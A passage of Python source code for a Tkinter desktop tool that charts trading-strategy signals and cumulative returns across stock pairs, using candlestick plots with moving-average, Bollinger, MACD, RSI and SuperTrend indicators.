for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(9999):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(11111):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(22222):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(33333):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(44444):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(55555):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
else:
return None
returnplot.grid(row = 1, column = 0)
#--signal visualization
class visu(ttk.Frame):
def __init__(self, master, path):
ttk.Frame.__init__(self, master)
self.path = path
self.figsize = (12, 7)
optionFrame = ttk.Frame(self)
style = ttk.Style()
name = tk.Label(optionFrame, text = 'Pairs')
name.grid(row = 1, column = 0)
style.map('TCombobox', fieldbackground=[('readonly','#e3104f')])
style.map('TCombobox', selectbackground=[('readonly', '#e3104f')])
style.map('TCombobox', selectforeground=[('readonly', 'white')])
self.pairs = ttk.Combobox(optionFrame, values = self.path['instruments'].split(','), state = 'readonly')
self.pairs.current(2)
self.pairs.focus()
self.pairs.grid(row = 1, column = 1, padx = 20, pady = 10)
self.pairs.bind("<<ComboboxSelected>>", self.callback)
strategy = tk.Label(optionFrame, text = 'Strategy').grid(row = 1, column = 2)
self.strategyOption = ttk.Combobox(optionFrame, values = self.path['strategy'], state = 'readonly')
self.strategyOption.current(32)
self.strategyOption.focus()
self.strategyOption.bind("<<ComboboxSelected>>", self.callback)
self.strategyOption.grid(row = 1, column = 3, padx = 20, pady = 10)
#timeframe frame
timframe = tk.Label(optionFrame, text = 'Timeframe').grid(row = 1, column = 4)
self.timeOption = ttk.Combobox(optionFrame, values = self.path['timeframes'], state = 'readonly')
self.timeOption.current(2)
self.timeOption.focus()
self.timeOption.bind("<<ComboboxSelected>>", self.callback)
self.timeOption.grid(row = 1, column = 5, padx = 20, pady = 10)
self.update = tk.Button(optionFrame, text = 'Update', bg = '#a1a09f', command = self.plots).grid(row = 1, column = 6)
#option frame
optionFrame.grid(row = 0, column = 0)
self.plots()
def callback(self, eventObject):
return eventObject.widget.get()
def multiIndicatorSignal(self, df):
positions = np.array(df.Position)
signal = np.zeros_like(positions)
initialPosition = positions[0]
for ii, pos in enumerate(positions):
if pos == initialPosition:
pass
else:
initialPosition = pos
if initialPosition == 'BUY':
signal[ii] = 1
elif initialPosition == 'SELL':
signal[ii] = -1
else:
signal[ii] = 2
df['viewSignal'] = list(signal)
return df
def plots(self):
frameplot = ttk.Frame(self)
grabpair = str(self.pairs.get())
grabstrategy = str(self.strategyOption.get())
grabtimeframe = str(self.timeOption.get())
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{self.strategyOption.get()}/{grabtimeframe}/{grabpair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data.dropna(inplace = True)
candlewidth = 1
markersize = 7
#--MA plot
if grabstrategy == str(1):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
try:
columns = [x for x in data.columns if x[:3] == 'EMA']
except:
columns = [x for x in data.columns if x[:3] == 'SMA']
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(np.arange(len(data)), data[columns[0]])
subplots.plot(np.arange(len(data)), data[columns[1]])
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[columns[0]][data.viewSignal == -1], 'v', color = 'r', markersize = markersize)
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[columns[1]][data.viewSignal == 1], '^', color = 'g', markersize = markersize)
subplots.legend(bbox_to_anchor=(0, 1.02, 1, .102), loc=3, ncol=5, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--Bollinger plot
elif grabstrategy == str(2):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(np.arange(len(data)), data.bollinger_band, LW = 1.)
subplots.plot(np.arange(len(data)), data.Upper_band, LW = 1.)
subplots.plot(np.arange(len(data)), data.Lower_band, LW = 1.)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['bollinger_band']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['bollinger_band']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.legend(bbox_to_anchor=(0, 1.02, 1, .102), loc=3, ncol=5, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MACD plot
elif grabstrategy == str(3):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--RSI plot
elif grabstrategy == str(4):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--SUper Trend plot
elif grabstrategy == str(5):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data['viewSignal'] = data.signal.diff()
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(np.arange(len(data)), data.SuperTrend, LW = 1.)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['SuperTrend']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['SuperTrend']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MA vs SUPER_TREND--
elif grabstrategy == str(6):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#-- MA vs MACD ----
elif grabstrategy == str(7):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MA vs RSI--
elif grabstrategy == str(8):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--- MA vs BOLLINGER BAND ---
elif grabstrategy == str(9):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#-- BOLLINGER BAND vs MACD
elif grabstrategy == str(11):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--BOLLINGER BAND vs RSI--
elif grabstrategy == str(22):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--BOLLINGER vs SUPERTREND --
elif grabstrategy == str(33):
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(subplots, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
subplots.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
subplots.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
subplots.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
fig.set_tight_layout(True)
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--RSI vs SUPER TREND --
elif grabstrategy == str(44):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.RSI, LW = 1.)
ax2.fill_between(data.index, y1=30, y2=70, color='#7eebed', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
#--MOVING AVERAGE vs BOLLINGER BAND vs MACD --
elif grabstrategy == str(55):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = 1.)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
